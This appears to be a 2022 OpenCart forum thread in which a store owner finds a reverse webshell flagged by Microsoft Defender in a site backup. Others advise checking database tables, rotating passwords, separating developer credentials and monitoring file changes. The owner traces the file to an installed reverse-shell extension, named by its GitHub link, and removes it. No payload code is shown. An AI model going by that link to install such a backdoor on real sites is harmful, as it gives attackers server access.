Post by fietsknecht » Mon Jun 20, 2022 11:21 pm

I hope I'm posting in the right forum.
I made a copy of my OC3 installation by zipping the complete home directory and ftp the zip to my home pc. Upon unzipping, Microsoft Defender gives a warning that Trojan:PHP/RevWebshell.YA!MTB is found in admin/controller/extension/extension/shell.php. The php file indeed looks weird (see attached zip). I have no idea how I got it on the server.
Anyone experienced something like this before?

Newbie

Posts

Joined
Fri Dec 27, 2019 9:03 pm

Post by ADD Creative » Tue Jun 21, 2022 12:41 am

Does look like some sort of malicious extension, intended to give someone access to the server. Looks like it requires admin access to use, so maybe it was installed as an extension. Check your oc_extension_path table in your database for that file to see if it was part of an extension. You could also check your FTP logs.

Probably best to change all your password related to your store and hosting.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by fietsknecht » Tue Jun 21, 2022 1:47 am

Thanks for your reply. I checked the oc_extension_path table in the database but could not find anything. My guess is the malicious php was put there by a so-called 'customer service representative' that I granted access via an additional account when I was having trouble with some extension (forgot which one). Of course I disabled the additional account right after he/she was finished, but apparently that wasn't enough. I now have deleted the faulty php and changed all my hosting and store related passwords. I will investigate further to see what extension was mingled with and will follow up here.

Newbie

Posts

Joined
Fri Dec 27, 2019 9:03 pm

Post by halfhope » Tue Jun 21, 2022 9:33 am

Hi!

Also check the oc_modufication table, there should be a reverse shell. If the site is infected, write to the PM. Cleaning with 1 year warranty.

My extensions at marketplace


User avatar
Active Member

Posts

Joined
Tue Dec 10, 2013 9:44 pm
Location - Russia, Chelyabinsk

Post by fietsknecht » Wed Jun 22, 2022 2:29 am

halfhope wrote:
Tue Jun 21, 2022 9:33 am
Also check the oc_modufication table, there should be a reverse shell.
Thanks! Somehow the https://github.com/miklcct/opencart_reverse_shell was installed on my system. I managed to remove all files.
Still don't know how it got there. Don't trust these developers that ask for access to your admin is all I can say.

Newbie

Posts

Joined
Fri Dec 27, 2019 9:03 pm

Post by halfhope » Thu Jun 23, 2022 2:07 am

fietsknecht wrote:
Wed Jun 22, 2022 2:29 am
Don't trust these developers that ask for access to your admin is all I can say.
Most work with opencart requires access to the admin panel and FTP.
1. Create separate credentials (FTP/admin) for developers. Disable them or change the password after finishing work.
2. Use password generators, don't create your own password.
3. Watch for all changes in files. You can use my extension FSMonitor for that.
4. Make regular backups of files and databases.

My extensions at marketplace


User avatar
Active Member

Posts

Joined
Tue Dec 10, 2013 9:44 pm
Location - Russia, Chelyabinsk
Who is online

Users browsing this forum: No registered users and 1 guest